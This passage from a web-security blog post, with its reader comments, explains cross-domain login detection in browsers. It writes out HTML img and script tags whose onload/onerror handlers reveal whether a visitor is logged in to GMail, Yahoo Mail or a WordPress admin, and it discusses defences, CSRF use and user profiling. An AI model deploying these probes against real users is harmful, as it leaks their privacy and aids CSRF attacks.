I’m sure similar URLs can be found on most any website with user accounts. The GMail URL responds with an image when the user is logged-in and HTML when their not. The YahooMail URL responds with just a simple HTML comment when logged-in or a large HTML error page when their not. The ha.ckers.org URL will only be served if you are logged as an admin on Wordpress, otherwise a forbidden message appears.
The ways the URLs respond are subtly different and require slightly unique approaches when applied to Firefox 3 (b3) as we’ll see next.
For GMail its extremely simple.
<* img src="https://mail.google.com/mail/pimages/2/icons_ns1.png" onload="alert('GMail: Logged-In')" onerror="alert('Gmail: Not Logged-in')">
The IMG tag onload event handler fires if a valid image returns while the onerror event handler fires on invalid images (example: receives HTML). Easy boolean logic. Of course additional code is required to send the results back to the server but that’s beyond our scope here.
The ha.ckers.org is exactly the same as GMail.
<* img src="http://ha.ckers.org/blog/wp-admin/images/toggle.gif" onload="alert('RSnake: Logged-In')" onerror="alert('RSnake: Not Logged-in')">
The YahooMail example is almost as simple, but has to be implemented a little differently since we’re dealing with only HTML responses and no images.
<* script src="http://us.mg1.mail.yahoo.com/dc/rs?log=SuccessfulLaunch" onload="alert('YahooMail: Logged-in')" onerror="alert('YahooMail: Not Logged-in')">* script>
Websites owners can do one of two things here:
Remove authentication from the resource if the content isn’t particularly sensitive
Add CSRF-like secret tokens so that the URL is not predictable
At the end of the day though its unlikely that any of these websites, or others with similar issues, will take either step. Even if they did there are so many other ways to pull off the same attack (timing attacks, monitoring onload events, probing for named iframes, JS console errors, etc) which makes the value somewhat limited. I had a long discussion with Chris Evans and Rich Cannings from Google about this particular issue to get their insights.
In our collective opinions its probably not the responsibility of the websites owners to change their (arguably secure) application behavior to compensate for the browser leaking cross-domain information. Though they still could if they really wanted to. Also its probably a lot easier for the browser vendors to remedy this issue in some clever way rather than every website owner doing the above. What do you think?
very nice post jeremiah. i check only google poc. if you choose different language (like slovak for example), poc not working. but it's very interesting find anyway
hrm, Yes, very intresting point of view there.
Thanks for the read. I always read your blogs!
But how do you get the events to trigger ? i tried sending an email to the gmail containing the image tag, and content-type set to text/html. the image showed but the onload event didn't trigger
@ehmo, thank you. Hmph, I wouldn't have thought that a language changed would have impacted that. Interesting. Im sure in that language other language settings there should be another image URL that does essentially the same thing.
@Thijs, thank you very much, I appreciate it. Every once in a while I get to have a little fun with web hacking. :)
@Anonymous, they event handlers should trigger automatically depending on the state of the user. Remember though, I've only testing on Firefox, if your using IE though could change things, but should still be able to work with some porting.
"Login Detection, whose problem is it?"
"IF" ot is deemed a problem for a particular site, then it it the site developer's problem.
Hackers, being hackers can not be expected to confine their behavior to secure browsers, nor can we rely on browser makers to make secure browsers.
I guess the answer depends on what type of attack you think this is.
1. Information leakage leading to privacy disclosure, website history stealing, etc.
2. A precursor to a CSRF attack (or other?)
If its #1, then I suppose in some ways we're sort of stuck with it. Almost all websites are going to have some sort of protected content that will allow the cross-domain user to determine status. There are several proposals out there for fixing CSRF with cookie tags that prevent cross-domain posting/sending of those cookies in certain scenarios. that might help this, though I think you might still end up with cases of information leakage.
If the problem we're worried about is #2, then preventing the information leakage isn't all that beneficial. For a large site like yahoo or google, you can blindly fire away at random users attempting CSRF attacks since you'll hit a decent number of them who will be logged in.
So, what are we trying to prevent? I'm not saying protecting against browser history/patterns isn't a serious goal, just trying to understand what you think the risks are.
I think you are correct in both cases. CSRF "attacks" will be performed blind, and the most likely abuse case for this will be privacy and data gathering. Probably marketings and advertisers.
While I also think cross-domain information leakage will persist for the foreseeable future, I would hope the browser vendors could make it a little harder to pull off.
It's fun but everytime i check your blog, i became a little more "security paranoid"...
I guess that this could be a browser issue... or not...
Should the browser allow a script in case an error occurrs?... it's a kinda csrf...
But well... just wait...
1) i hate that u use blogspot... i don't like this "comment page"...
2) You aren't the first result in google anymore :P
hola. I am new to this blog and it do seems like a really cool site on web security. =D
Just to clarify something, to perform this kind of information gathering, we would still need to insert the java script into the client browser isn't it ?
Secondly, the script would have to leech predefine script var to get the username ?
@Ironic, yah, my blog tends to have that affect on people. We give the gift of paranoia. :) Also, "jeremiah grossman" comes #1 on google, I'm working on "jeremiah" next. :)
@MauricE, the answer to your first question is yes, you need to find a way to run JS in the persons browser first. With this method though you really can't tell WHO they are logged-in as.... only that they are logged-in.
Depending on how the output of the authenticated area or content is both formed and produced one may also use enumeration methods similar to those found in the RES protocol vulnerability where the images' widths and heights are checked and tested against the known values for logged-in users. Of course that is assuming the "flag" for a user's status is produced in the form of an image, but it would also be possible to read other attributes as well depending on the type of file. It is definitely a precursor to initiating and leveraging CSRF attacks against users.
@Andrew, good points. I've been thinking a lot about your last sentence lately. I'm on the fence as to if an authentication-csrf check by the attacker preceeds the actual attack. I mean, why not just perform the attack blind? Its faster and easier and if it works, it works. Im thinking authentication-csrf checks are probably done for using profiling (marketing) more than anything else.
While I agree that attempting to perform the CSRF attack blindly is indeed much quicker and easier it is also more likely to alert unsuspecting users should something go awry in the script/attack. Granted a large majority of individuals may not realize what is going on however there are attentive users who may question why a Google or Yahoo! (just examples) URL has appeared briefly in the browser's status bar indicating something has loaded from such third-party websites. Of course again it really comes down to the method being used to perform the attack along with the content output when users are authenticated. I suppose it's just a personal preference, but I always have checks and boundaries in place on the payloads I write to make sure such functions are not executed prematurely, or in instances where users will not be able to complete each task, because again there's no reason to alert the user (or victim) of any wrong-doing if it is not going to be successful.
Post a Comment